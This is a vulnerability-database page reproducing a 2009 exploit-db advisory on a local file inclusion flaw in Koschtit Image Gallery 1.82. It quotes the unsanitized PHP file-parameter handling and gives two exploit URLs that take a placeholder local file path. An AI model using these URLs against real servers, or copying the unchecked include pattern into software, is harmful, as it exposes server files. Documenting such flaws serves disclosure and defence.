Lucene search
+L

Koschtit Image Gallery 1.82 - Multiple Local File Inclusions

🗓️ 01 Apr 2009 00:00:00Reported by ahmadbadyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Koschtit Image Gallery 1.82 Local File Inclusion

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1510
1 Apr 200900:00
circl
cve
CVE
CVE-2009-1510
1 May 200918:00
cve
cvelist
Cvelist
CVE-2009-1510
1 May 200918:00
cvelist
euvd
EUVD
EUVD-2009-1507
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1510
1 May 200918:30
nvd
openvas
OpenVAS
KoschtIT Image Gallery Multiple Directory Traversal Vulnerabilities
22 May 200900:00
openvas
prion
Prion
Directory traversal
1 May 200918:30
prion
                            :local file include:

#############################
script: koschtit_image_gallery(v1.82)

##############################################################
download from:http://koschtit..tabere.net/download/
or http://koschtit.tabere.net/en/#getit

##############################################################
vul:/ki_base/ki_makepic.php


if(isset($_GET['file']))
 $file = "../ki_galleries/".$_GET['file'];
else
 exit();

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
if(is_file("../ki_config/".$gallery."_ki_setup.php"))
 include_once("../ki_config/".$gallery."_ki_setup.php");

$imgsize = getimagesize($file);

#############
vul:/ki_base/ki_nojsdisplayimage.php

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));

include_once("../ki_config/ki_setup.php");
if(is_file(".../ki_config/".$gallery."_ki_setup.php")){
 include_once("../ki_config/".$gallery."_ki_setup.php");
}
.
.
$srcfile = "../ki_galleries/".$file;
$imgsize = getimagesize("../ki_galleries/".$file);

##############################################################
xpl:
path/ki_base/ki_makepic.php?file=[local_file]
path/ki_base/ki_nojsdisplayimage.php?file=[local_file]
------------------------------------------------------------

# milw0rm.com [2009-04-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02249
29